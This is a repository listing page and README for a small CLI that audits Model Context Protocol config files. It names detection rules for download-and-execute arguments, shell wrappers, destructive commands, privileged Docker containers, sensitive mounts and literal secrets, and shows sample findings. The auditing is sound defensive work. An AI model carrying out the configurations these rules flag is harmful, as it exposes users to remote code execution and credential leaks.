MCP Servers

A collection of Model Context Protocol servers, templates, tools and more.

M
MCP Config Auditor
by @283352041
GitHub Repo(1 stars)

MCP server by 283352041

Created 6/6/2026
Updated about 5 hours ago
README
View Source
Repository documentation and setup instructions

MCP Config Auditor

A tiny zero-dependency CLI that audits Model Context Protocol server configs for risky commands, literal secrets, and unsafe paths.

MCP makes it easy to connect AI tools to local files, shell commands, package runners, and remote services. That is powerful, but it also means config files deserve a quick security review before you copy, share, or run them.

Features

  • Scans mcpServers or servers config objects.
  • Flags shell wrappers, command metacharacters, download-and-execute patterns, destructive commands, privileged Docker containers, sensitive Docker mounts, literal secrets, and missing working directories.
  • Supports human-readable and JSON output.
  • Works without dependencies.
  • Can fail CI when findings reach a chosen severity.

Quick Start

node ./bin/mcp-audit.js ./examples/unsafe-config.json

Output:

examples/unsafe-config.json
Status: Review needed
Servers: remote-installer, docker-admin
Findings:
  - HIGH shell-wrapper [remote-installer]: Server is launched through a shell. Review arguments for command injection risk.
  - CRITICAL download-execute [remote-installer]: Arguments appear to download and execute remote content.
  - HIGH literal-secret [remote-installer]: Environment variable name looks sensitive and contains a literal value.
  - HIGH docker-privileged [docker-admin]: Docker server runs with --privileged.
  - HIGH docker-sensitive-mount [docker-admin]: Docker arguments appear to mount a sensitive host path.

Install Locally

npm install -g .
mcp-audit path/to/claude_desktop_config.json

You can also run it directly:

node ./bin/mcp-audit.js path/to/claude_desktop_config.json

Usage

mcp-audit [files...] [--json] [--fail-on low|medium|high|critical]

If no files are provided, the CLI checks common Claude Desktop and local config locations:

  • %APPDATA%\Claude\claude_desktop_config.json
  • ~/Library/Application Support/Claude/claude_desktop_config.json
  • ~/.config/Claude/claude_desktop_config.json
  • ./claude_desktop_config.json
  • ./.mcp.json

CI Example

name: MCP config audit

on:
  pull_request:
  push:
    branches: [main]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: node ./bin/mcp-audit.js ./.mcp.json --fail-on high

Finding Severities

| Severity | Meaning | | --- | --- | | critical | Likely dangerous behavior, such as download-and-execute or secret-looking values. | | high | Risky configuration that should be manually reviewed before use. | | medium | Portability or repeatability issue. | | low | Hygiene issue that may still be worth fixing. |

Roadmap

  • Add SARIF output for GitHub code scanning.
  • Add config allowlists for trusted local commands.
  • Add package-version checks for npx, uvx, and Docker images.
  • Add VS Code and Cursor MCP config discovery.

License

MIT

Review Workflow

  1. Run the auditor before copying a config from another machine.
  2. Review every high or critical finding manually.
  3. Prefer pinned package versions and explicit working directories.
Quick Setup
Installation guide for this server

Install Package (if required)

npx @modelcontextprotocol/server-mcp-config-auditor

Cursor configuration (mcp.json)

{ "mcpServers": { "283352041-mcp-config-auditor": { "command": "npx", "args": [ "283352041-mcp-config-auditor" ] } } }